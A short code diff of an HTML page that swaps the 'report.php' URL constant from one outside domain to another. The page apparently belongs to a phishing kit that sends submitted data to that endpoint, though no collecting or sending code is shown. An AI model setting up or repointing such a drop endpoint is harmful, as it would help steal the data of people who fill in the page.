--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
   </head>
   <body class="skin-blue">
 <script>
-const url = 'https://millenniumauto.slippersstudio.com//report.php';    //full url goes here
+const url = 'https://ecommerce.indokoneksi.com/mugu/report.php';    //full url goes here
 </script>
 
 <script type="text/javascript">
